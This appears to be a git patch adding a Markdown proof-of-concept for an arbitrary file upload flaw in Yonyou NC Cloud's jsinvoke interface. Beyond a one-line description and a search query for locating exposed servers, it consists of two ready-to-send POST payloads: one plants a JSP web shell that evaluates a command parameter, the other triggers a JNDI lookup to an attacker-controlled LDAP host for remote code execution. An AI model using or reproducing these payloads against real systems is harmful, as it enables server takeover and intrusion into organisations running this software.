From 6cc2e7e604de9b8a5df111315647c15093b6e4e7 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Sat, 19 Aug 2023 20:39:39 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E7=94=A8=E5=8F=8B=20NC=20Cloud=20jsin?=
 =?UTF-8?q?voke=20=E4=BB=BB=E6=84=8F=E6=96=87=E4=BB=B6=E4=B8=8A=E4=BC=A0?=
 =?UTF-8?q?=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 用友 NC Cloud jsinvoke 任意文件上传漏洞.md | 42 ++++++++++++++++++++++
 1 file changed, 42 insertions(+)
 create mode 100644 用友 NC Cloud jsinvoke 任意文件上传漏洞.md

diff --git a/用友 NC Cloud jsinvoke 任意文件上传漏洞.md b/用友 NC Cloud jsinvoke 任意文件上传漏洞.md
new file mode 100644
index 0000000..e6c4d24
--- /dev/null
+++ b/用友 NC Cloud jsinvoke 任意文件上传漏洞.md	
@@ -0,0 +1,42 @@
+## 用友 NC Cloud jsinvoke 任意文件上传漏洞
+漏洞描述
+用友 NC Cloud jsinvoke 接口存在任意文件上传漏洞，攻击者通过漏洞可以上传任意文件至服务器中，获取系统权限
+app="用友-NC-Cloud"
+
+```
+POST /uapjs/jsinvoke/?action=invoke
+Content-Type: application/json
+
+{
+  "serviceName": "nc.itf.iufo.IBaseSPService",
+  "methodName": "saveXStreamConfig",
+  "parameterTypes": [
+    "java.lang.Object",
+    "java.lang.String"
+  ],
+  "parameters": [
+    "${param.getClass().forName(param.error).newInstance().eval(param.cmd)}",
+    "webapps/nc_web/407.jsp"
+  ]
+}
+
+POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
+Host:
+Connection: Keep-Alive
+Content-Length: 253
+Content-Type: application/x-www-form-urlencoded
+
+{
+  "serviceName": "nc.itf.iufo.IBaseSPService",
+  "methodName": "saveXStreamConfig",
+  "parameterTypes": [
+    "java.lang.Object",
+    "java.lang.String"
+  ],
+  "parameters": [
+    "${''.getClass().forName('javax.naming.InitialContext').newInstance().lookup('ldap://VPSip:1389/TomcatBypass/TomcatEcho')}",
+    "webapps/nc_web/301.jsp"
+  ]
+}
+
+```